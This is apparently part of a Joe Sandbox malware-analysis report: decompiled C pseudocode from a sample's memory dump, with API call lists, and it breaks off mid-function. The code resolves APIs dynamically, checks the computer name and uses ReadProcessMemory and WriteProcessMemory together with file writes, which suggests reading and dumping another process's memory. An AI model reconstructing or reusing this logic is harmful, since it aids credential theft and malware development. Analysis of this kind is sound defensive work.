    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F631AB(void* __eax) {
    				signed int _v8;
    				long _v12;
    				short _v532;
    				void* __esi;
    				int _t25;
    				void* _t27;
    				void* _t30;
    				intOrPtr _t33;
    				signed int _t36;
    				void _t40;
    				void* _t46;
    				void* _t47;
    				signed int _t48;
    				void* _t50;
    				void* _t52;
    
    				_t47 = __eax;
    				_v8 = 1;
    				_v12 = 0x208;
    				_t25 = GetComputerNameW( &_v532,  &_v12); // executed
    				if(_t25 == 0) {
    					L5:
    					if( *((intOrPtr*)(_t47 + 0x30)) == 0) {
    						L10:
    						_v8 = 0;
    					} else {
    						_t11 = _t47 + 0x14; // 0x30
    						_t33 =  *_t11;
    						if(_t33 != 2 && _t33 != 0xa && _t33 != 0xb && _t33 != 0xc) {
    							goto L10;
    						}
    					}
    					if(_v8 != 0) {
    						_t14 = _t47 + 0xc; // 0x8
    						_t27 = E00F63168( *_t14);
    						_t50 = _t27;
    						if(_t50 != 0) {
    							_t15 = _t27 + 2; // 0x2
    							_t46 = _t15;
    							do {
    								_t40 =  *_t27;
    								_t27 = _t27 + 2;
    							} while (_t40 != 0);
    							_t48 = _t27 - _t46 >> 1;
    							_t30 = E00F63746(_t50, 0x24);
    							_t17 = _t48 * 2; // -2
    							if(_t50 + _t17 - 2 == _t30 || E00F63746(_t50, 0x40) != 0) {
    								_v8 = _v8 & 0x00000000;
    							}
    							LocalFree(_t50);
    						}
    					}
    				} else {
    					_t5 = _t47 + 0x10; // 0x2c
    					_t52 = E00F63168( *_t5);
    					if(_t52 == 0) {
    						goto L5;
    					} else {
    						_t36 = StrCmpIW(_t52,  &_v532); // executed
    						if(_t36 == 0) {
    							_v8 = _v8 & _t36;
    						}
    						LocalFree(_t52);
    						if(_v8 != 0) {
    							goto L5;
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • GetComputerNameW.KERNEL32(?,?,00F69CC4,?,0000A2A4), ref: 00F631D2
    • StrCmpIW.SHLWAPI(00000000,?), ref: 00F631F8
    • LocalFree.KERNEL32(00000000), ref: 00F63206
      • Part of subcall function 00F63168: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
      • Part of subcall function 00F63168: GetProcAddress.KERNEL32(00000000), ref: 00F63189
    • _wcschr.LIBCMT ref: 00F63259
    • _wcschr.LIBCMT ref: 00F6326B
    • LocalFree.KERNEL32(00000000), ref: 00F6327B
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 77%
    			E00F6134E(signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void* _v28;
    				intOrPtr _t43;
    				signed int _t44;
    				signed int _t46;
    				_Unknown_base(*)()* _t48;
    				signed int _t49;
    				signed int _t51;
    				signed int _t54;
    				signed int _t57;
    				signed int _t59;
    				intOrPtr _t60;
    				signed int _t61;
    				intOrPtr _t77;
    				signed int _t80;
    				void* _t81;
    				void* _t82;
    				void* _t83;
    				intOrPtr* _t85;
    
    				_t85 = _a12;
    				_t43 =  *((intOrPtr*)(_t85 + 8));
    				_t60 =  *_t85;
    				_v12 = _t60 + _t43;
    				_v28 = 0;
    				_v24 = 0xf6cd30;
    				_v20 = _t43;
    				_v16 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)))) != 0) {
    					L6:
    					_t61 = _a4;
    				} else {
    					_t72 =  *((intOrPtr*)(_t85 + 4));
    					_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4))));
    					if(_t77 == 0) {
    						_t46 = _a8 + _t60;
    						__eflags = _t46;
    						while(1) {
    							__eflags = _t46 - _v12;
    							if(__eflags > 0) {
    								break;
    							}
    							asm("repe cmpsb");
    							_t85 = _a12;
    							_t80 = 0 | __eflags == 0x00000000;
    							_t60 = _t60 + 1;
    							_t46 = _t46 + 1;
    							_v8 = _t80;
    							__eflags = _t80;
    							if(_t80 == 0) {
    								continue;
    							}
    							break;
    						}
    						_t61 = _t60 - 1;
    					} else {
    						_t81 = _t77 - 1;
    						if(_t81 == 0) {
    							L11:
    							_t48 = GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"); // executed
    							_t49 =  *_t48(0x40, _t43); // executed
    							_v28 = _t49;
    							__eflags = _t49;
    							if(_t49 == 0) {
    								goto L6;
    							} else {
    								_t51 = E00F61149( &_v28, _t85,  *((intOrPtr*)(_t85 + 8))); // executed
    								__eflags = _t51;
    								if(_t51 == 0) {
    									L15:
    									_t61 = _a4;
    								} else {
    									_push(0);
    									_t54 = E00F6134E(_a4, _a8,  &_v28);
    									_v8 = _t54;
    									__eflags = _t54;
    									if(_t54 == 0) {
    										goto L15;
    									} else {
    										_t61 =  *_t85 - _v28 + _v16;
    									}
    								}
    								LocalFree(_v28);
    							}
    						} else {
    							_t82 = _t81 - 1;
    							if(_t82 == 0) {
    								_t57 = E00F6175D( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)))), _t60, _t43);
    								_v28 = _t57;
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L6;
    								} else {
    									_push(0);
    									_t59 = E00F6134E(_a4, _a8,  &_v28);
    									_v8 = _t59;
    									__eflags = _t59;
    									if(_t59 == 0) {
    										goto L6;
    									} else {
    										_t61 =  *_t85 - _v28 + _v16;
    									}
    								}
    							} else {
    								_t83 = _t82 - 1;
    								if(_t83 == 0 || _t83 == 3) {
    									goto L11;
    								} else {
    									goto L6;
    								}
    							}
    						}
    					}
    				}
    				_t44 = _v8;
    				asm("sbb ecx, ecx");
    				 *(_t85 + 0xc) =  ~_t44 & _t61;
    				return _t44;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 93%
    			E00F63640(void* __eax, intOrPtr* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				void* _v20;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				void* _t18;
    				void* _t23;
    				intOrPtr _t24;
    				intOrPtr _t28;
    				long _t29;
    				intOrPtr* _t34;
    				signed int _t44;
    				void* _t46;
    				intOrPtr _t50;
    
    				_t46 = (_t44 & 0xfffffff8) - 0x14;
    				_t34 = _a4;
    				_t31 =  *_t34;
    				_v12 = 0;
    				_v8 = 0xf6cd30;
    				_v20 = 0;
    				_v16 =  *((intOrPtr*)( *_t34));
    				_t50 =  *0xf6bb58; // 0x0
    				if(_t50 != 0) {
    					L3:
    					_t17 =  *0xf6cd84; // 0x0
    					_t28 =  *0xf6cd88; // 0x0
    					_v20 = _t17;
    					_t29 = _t28 + 0x18; // executed
    					_t18 = E00F63594( *((intOrPtr*)(_t34 + 8)),  &_v20); // executed
    					_v20 = _t18;
    					if(_t18 != 0) {
    						_push(_t29);
    						_push(0x40);
    						_t18 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    						_v20 = _t18;
    						if(_t18 != 0) {
    							_t23 = E00F61149( &_v20,  &_v20, _t29); // executed
    							if(_t23 != 0) {
    								_t24 =  *0xf6cd88; // 0x0
    								_t25 = _t24 + _v20;
    								if(_t24 + _v20 != 0) {
    									E00F63303(_t25); // executed
    								}
    							}
    							_t18 = LocalFree(_v20);
    						}
    					}
    					goto L9;
    				} else {
    					_t18 = E00F634D4(_t31, 0xf6bb40, 0xf6bba8, 5, 0xf6cd84, 0, 0xf6cd88); // executed
    					_t46 = _t46 + 0x14;
    					if(_t18 == 0) {
    						L9:
    						return _t18;
    					}
    					goto L3;
    				}
    			}

    APIs
      • Part of subcall function 00F63594: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
      • Part of subcall function 00F63594: GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F63594: LocalFree.KERNEL32(?), ref: 00F63634
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000018), ref: 00F636C9
    • GetProcAddress.KERNEL32(00000000), ref: 00F636D0
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63709
      • Part of subcall function 00F63303: StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
      • Part of subcall function 00F63303: wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
      • Part of subcall function 00F63303: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
      • Part of subcall function 00F63303: GetProcAddress.KERNEL32(00000000), ref: 00F6346E
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F6347B
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F63489
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F63497
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634A9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634B9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634C9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 93%
    			E00F63642(intOrPtr* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				void* _v20;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				void* _t21;
    				intOrPtr _t22;
    				intOrPtr _t26;
    				long _t27;
    				intOrPtr* _t32;
    				signed int _t39;
    				void* _t41;
    				intOrPtr _t43;
    
    				_t41 = (_t39 & 0xfffffff8) - 0x14;
    				_t32 = _a4;
    				_t29 =  *_t32;
    				_v12 = 0;
    				_v8 = 0xf6cd30;
    				_v20 = 0;
    				_v16 =  *((intOrPtr*)( *_t32));
    				_t43 =  *0xf6bb58; // 0x0
    				if(_t43 != 0) {
    					L2:
    					_t15 =  *0xf6cd84; // 0x0
    					_t26 =  *0xf6cd88; // 0x0
    					_t36 =  &_v20;
    					_v20 = _t15;
    					_t27 = _t26 + 0x18; // executed
    					_t16 = E00F63594( *((intOrPtr*)(_t32 + 8)),  &_v20); // executed
    					_v20 = _t16;
    					if(_t16 != 0) {
    						_push(_t27);
    						_push(0x40);
    						_t16 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    						_v20 = _t16;
    						if(_t16 != 0) {
    							_t21 = E00F61149( &_v20, _t36, _t27); // executed
    							if(_t21 != 0) {
    								_t22 =  *0xf6cd88; // 0x0
    								_t23 = _t22 + _v20;
    								if(_t22 + _v20 != 0) {
    									E00F63303(_t23); // executed
    								}
    							}
    							_t16 = LocalFree(_v20);
    						}
    					}
    					L8:
    					return _t16;
    				}
    				_t16 = E00F634D4(_t29, 0xf6bb40, 0xf6bba8, 5, 0xf6cd84, 0, 0xf6cd88); // executed
    				_t41 = _t41 + 0x14;
    				if(_t16 == 0) {
    					goto L8;
    				}
    				goto L2;
    			}

    APIs
      • Part of subcall function 00F63594: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
      • Part of subcall function 00F63594: GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F63594: LocalFree.KERNEL32(?), ref: 00F63634
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000018), ref: 00F636C9
    • GetProcAddress.KERNEL32(00000000), ref: 00F636D0
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63709
      • Part of subcall function 00F63303: StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
      • Part of subcall function 00F63303: wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
      • Part of subcall function 00F63303: GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
      • Part of subcall function 00F63303: GetProcAddress.KERNEL32(00000000), ref: 00F6346E
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F6347B
      • Part of subcall function 00F63303: LocalFree.KERNEL32(00000000), ref: 00F63489
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F63497
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634A9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634B9
      • Part of subcall function 00F63303: LocalFree.KERNEL32(?), ref: 00F634C9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 93%
    			E00F63594(intOrPtr* __edi, void** __esi) {
    				char _v8;
    				intOrPtr _v12;
    				void _v16;
    				intOrPtr _v20;
    				void* _v24;
    				void* _t25;
    				void* _t28;
    				void* _t29;
    				void _t31;
    				void* _t34;
    				void _t35;
    				void _t38;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    				void* _t42;
    				void* _t43;
    
    				_t41 = __esi;
    				_t40 = __edi;
    				_push(0x18);
    				_push(0x40);
    				_v16 =  &_v8;
    				_t35 = 0;
    				_v12 = 0xf6cd30;
    				_v24 = 0;
    				_v20 = 0xf6cd30;
    				_t25 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    				_v24 = _t25;
    				if(_t25 != 0) {
    					_t28 = E00F61149( &_v16, __esi, 4); // executed
    					_t43 = _t42 + 0xc;
    					if(_t28 == 0) {
    						L9:
    						_t29 = _v24;
    					} else {
    						_t31 = _v8;
    						_v16 = _t31;
    						_v12 =  *((intOrPtr*)(__esi + 4));
    						if(_t31 !=  *((intOrPtr*)(__esi))) {
    							while(1) {
    								_t34 = E00F61149( &_v24,  &_v16, 0x18); // executed
    								_t43 = _t43 + 0xc;
    								if(_t34 == 0) {
    									goto L9;
    								}
    								_t29 = _v24;
    								if( *_t40 !=  *((intOrPtr*)(_t29 + 0x10)) ||  *((intOrPtr*)(_t40 + 4)) !=  *((intOrPtr*)(_t29 + 0x14))) {
    									_t38 =  *_t29;
    									_v16 = _t38;
    									if(_t38 !=  *_t41) {
    										continue;
    									} else {
    									}
    								} else {
    									_t35 = _v16;
    								}
    								goto L10;
    							}
    						}
    						goto L9;
    					}
    					L10:
    					LocalFree(_t29);
    				}
    				return _t35;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018), ref: 00F635BF
    • GetProcAddress.KERNEL32(00000000), ref: 00F635C6
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • LocalFree.KERNEL32(?), ref: 00F63634
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 24%
    			E00F64E29(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t36;
    				intOrPtr* _t40;
    				intOrPtr _t45;
    				intOrPtr _t47;
    				intOrPtr* _t52;
    				intOrPtr* _t54;
    				void* _t55;
    				void* _t57;
    
    				_push(0x20);
    				_push(0xf69e98);
    				E00F65910(__ebx, __edi, __esi);
    				E00F66117(__ebx, __edi, 8);
    				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    				_t57 =  *0xf6c030 - 1; // 0x0
    				if(_t57 != 0) {
    					 *0xf6c02c = 1;
    					_t34 =  *((intOrPtr*)(_t55 + 0x10));
    					 *0xf6c028 =  *((intOrPtr*)(_t55 + 0x10));
    					if( *((intOrPtr*)(_t55 + 0xc)) == 0) {
    						_t54 = __imp__DecodePointer;
    						_t34 =  *_t54( *0xf6cea8);
    						_t45 = 1;
    						 *((intOrPtr*)(_t55 - 0x30)) = 1;
    						if(1 != 0) {
    							_t34 =  *_t54( *0xf6cea4);
    							_t52 = 1;
    							 *((intOrPtr*)(_t55 - 0x2c)) = 1;
    							 *((intOrPtr*)(_t55 - 0x24)) = 1;
    							 *((intOrPtr*)(_t55 - 0x28)) = 1;
    							while(1) {
    								_t52 = _t52 - 4;
    								 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    								if(_t52 < _t45) {
    									goto L11;
    								}
    								if( *_t52 == _t34) {
    									continue;
    								} else {
    									if(_t52 >= _t45) {
    										_t40 =  *_t54( *_t52);
    										 *_t52 = E00F64593(_t40);
    										 *_t40();
    										_t47 =  *_t54( *0xf6cea8);
    										_t34 =  *_t54( *0xf6cea4);
    										if( *((intOrPtr*)(_t55 - 0x24)) != _t47 ||  *((intOrPtr*)(_t55 - 0x28)) != _t34) {
    											 *((intOrPtr*)(_t55 - 0x24)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x30)) = _t47;
    											 *((intOrPtr*)(_t55 - 0x28)) = _t34;
    											_t52 = _t34;
    											 *((intOrPtr*)(_t55 - 0x2c)) = _t52;
    										}
    										_t45 =  *((intOrPtr*)(_t55 - 0x30));
    										continue;
    									}
    								}
    								goto L11;
    							}
    						}
    						L11:
    						 *((intOrPtr*)(_t55 - 0x1c)) = 0xf68184;
    						while( *((intOrPtr*)(_t55 - 0x1c)) < 0xf68188) {
    							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x1c))));
    							if(_t34 != 0) {
    								_t34 =  *_t34();
    							}
    							 *((intOrPtr*)(_t55 - 0x1c)) =  *((intOrPtr*)(_t55 - 0x1c)) + 4;
    						}
    					}
    					 *((intOrPtr*)(_t55 - 0x20)) = 0xf6818c;
    					while( *((intOrPtr*)(_t55 - 0x20)) < 0xf68190) {
    						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x20))));
    						if(_t34 != 0) {
    							_t34 =  *_t34();
    						}
    						 *((intOrPtr*)(_t55 - 0x20)) =  *((intOrPtr*)(_t55 - 0x20)) + 4;
    					}
    				}
    				 *(_t55 - 4) = 0xfffffffe;
    				L23();
    				if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    					return E00F65955(_t34);
    				} else {
    					 *0xf6c030 = 1;
    					_t36 = E00F6603E(8);
    					E00F64D11( *((intOrPtr*)(_t55 + 8))); // executed
    					if( *((intOrPtr*)(_t55 + 0x10)) != 0) {
    						return E00F6603E(8);
    					}
    					return _t36;
    				}
    			}

    APIs
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • DecodePointer.KERNEL32(00F69E98,00000020,00F64F90,00000000,00000001,00000000,?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64E73
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64E84
      • Part of subcall function 00F64593: EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    • DecodePointer.KERNEL32(-00000004,?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EAA
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EBD
    • DecodePointer.KERNEL32(?,00F64FD0,000000FF,?,00F6613E,00000011,?,?,00F64660,0000000D), ref: 00F64EC7
      • Part of subcall function 00F6603E: LeaveCriticalSection.KERNEL32(?,00F66115,0000000A,00F66105,00F69EB8,0000000C,00F66132,00000000,?,?,00F64660,0000000D), ref: 00F6604D
      • Part of subcall function 00F64D11: ExitProcess.KERNEL32 ref: 00F64D22
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 21%
    			E00F66F94(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t11;
    				intOrPtr _t13;
    				void* _t19;
    				intOrPtr _t22;
    				void* _t23;
    				intOrPtr _t24;
    				void* _t26;
    				void* _t27;
    				void* _t33;
    				signed int _t36;
    				intOrPtr* _t37;
    				void* _t39;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    
    				_t40 = __imp__DecodePointer;
    				_t11 =  *_t40( *0xf6cea8, _t33, _t39, _t23, _t27);
    				_t24 = _t11;
    				_v8 = _t24;
    				_t41 =  *_t40( *0xf6cea4);
    				if(_t41 < _t24) {
    					L11:
    					_t13 = 0;
    				} else {
    					_t36 = _t41 - _t24;
    					_t2 = _t36 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L11;
    					} else {
    						_t26 = E00F67C27(_t24);
    						_t3 = _t36 + 4; // 0x4
    						if(_t26 >= _t3) {
    							L10:
    							_t37 = __imp__EncodePointer;
    							 *_t41 =  *_t37(_a4);
    							 *0xf6cea4 =  *_t37(_t41 + 4);
    							_t13 = _a4;
    						} else {
    							_t19 = 0x800;
    							if(_t26 < 0x800) {
    								_t19 = _t26;
    							}
    							_t20 = _t19 + _t26;
    							if(_t19 + _t26 < _t26) {
    								L7:
    								_t5 = _t26 + 0x10; // 0x10
    								_t21 = _t5;
    								if(_t5 < _t26) {
    									goto L11;
    								} else {
    									_t22 = E00F66215(_v8, _t21);
    									if(_t22 == 0) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								}
    							} else {
    								_t22 = E00F66215(_v8, _t20);
    								if(_t22 != 0) {
    									L9:
    									_t41 = _t22 + (_t36 >> 2) * 4;
    									__imp__EncodePointer(_t22);
    									 *0xf6cea8 = _t22;
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    				return _t13;
    			}

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F66FA9
    • DecodePointer.KERNEL32(?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F66FB6
      • Part of subcall function 00F67C27: HeapSize.KERNEL32(00000000,00000000,?,00000003,00F66D23,00F69ED8,00000008,00F64CD2), ref: 00F67C52
      • Part of subcall function 00F66215: Sleep.KERNEL32(00000000,00000000,00000000,?,00F6700E,00000000,00000010,?,?,?,?,?,00F67098,?,00F69F18,0000000C), ref: 00F6623F
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F6701B
    • EncodePointer.KERNEL32(?,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F6702F
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,00F67098,?,00F69F18,0000000C,00F670C4,?,?,00F64DDF,00F658CC), ref: 00F67037
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 88%
    			E00F61EFA(intOrPtr __ecx, void* __esi) {
    				char* _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				char _t17;
    				signed int _t19;
    				char _t22;
    				intOrPtr _t26;
    				char _t28;
    
    				_t28 = 0;
    				_v8 =  &_v20;
    				_t17 =  *((intOrPtr*)(__esi + 4));
    				_v20 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v28 = _t17;
    				_v24 = __ecx;
    				 *((intOrPtr*)(__esi + 4)) = 0;
    				if(_t17 != 0) {
    					_t19 =  *(__esi + 2) & 0x0000ffff;
    					if(_t19 != 0) {
    						_push(_t19);
    						_push(0x40);
    						_t22 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
